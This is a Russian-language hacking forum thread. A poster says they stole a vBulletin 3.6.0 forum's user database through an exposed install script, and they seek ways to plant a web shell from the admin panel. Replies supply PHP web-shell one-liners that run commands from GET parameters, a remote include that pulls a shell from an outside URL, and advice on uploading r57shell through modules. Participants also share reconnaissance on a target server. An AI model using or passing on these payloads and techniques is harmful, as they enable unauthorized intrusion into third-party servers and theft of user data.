Вобщем, есть форум где стоит булка версии 3.6.0. Админ ище настраивает и пока не почитстил install. Т.е. пример: http://target.ru/forum/install/upgrade_301.php?step=бла бла бла Скомуниздил БД юзров, подобрал пасы. Имею доступ к админке но залить шелл ни как не выходит. Приведеные способы на форуме не работают Кто знает как подскажите плизз с меня репа.
Люди вы издеваетесь Я ведь написал что все приведеные способы на форуме не работают нужно что то новинькое а гугле пабликов на v3.6.0 нету ничего Мож кто знает что то новенькое?
Может и можна но миниатюрный там ограничение на размер стоит. При впаривании туда r57shell выдается эго верхняя панель только, та где инфа по серверу. Тут ужно что то другое искать.
а ты не знал что кроме рст есть например <?system($c);?> и усе, ну разве что подделать немного <?system($_GET['c']);?>, а если вообще красиво <? if (!empty($_GET['cmd'])) { echo '<pre>'; system($_GET['cmd']); echo '</pre>'; exit; } ?> или если есть корявая настройка в php - allow_url_fopen=On, то <? include('http://путь_к_шеллу_рст_без_счетчиков_нах.txt') ?>
Спасибо max_pain что откликнулся, но даже таким макаром ничего незалить на серв уже пробывал. Нада не через модули наверно или через другие Сижу все подряд проверяю
Elenberg почему нече нельзя залить? через модули вписываеш <? passthru($cmd) ?> получаеш доступ в CMD смотриш папки с правами и потом уже заливаеш r57.
Проблемы с шеллом У меня та же проблема с шеллом. Заливаю в vB 3.5.4 через модули <?system($_GET['c']);?> но при обращении к www.xz.сom/forumpath/faq.php?cmd=dir вместо листинга открывается страница с ФАК-ом. Кто что посоветует?
Оо хмм де ты на этом сайте увидел какая ОС стоит на определёном сервере? может ты увидел эту картинку и не прочитал что на ней написано? =)
Угрюмый, вот тема может помочь damagelab.org/index.php?showtopic=15286 P.S. Как тут файлы прикреплять ?
То Doom123 Server Type: Microsoft-IIS/6.0 IP Address: 2*.***.**.**5 IP Location - Kansas - Wichita - Road Runner Holdco Llc Response Code: 200 Blacklist Status: Clear Domain Status: Registered And Active Website Отсюда я сделал вывод об ОСи на сервере. Я ошибся? То dT3. Спасибо за участие и ссылку. Если имелась в виду ПассвордПро, то я ее уже юзаю. А вообще интересный сайтец. Надо будет побродить... То Rejjin Ты хоть слово видел о ВЗЛОМЕ Ачата??? Я с простым сервером не могу справиться, а ты мне приписываешь ТАКИЕ грандиозные планы... Хотя... Вот когда поднаучусь! Как говорится, плох тот солдат, который не мечтает...
Кто нибудь скажите, есть шелл что приведен в теме, как залить "нормальный" чтобы можно было не команды выполнять, а в интерфейсе работать!!!!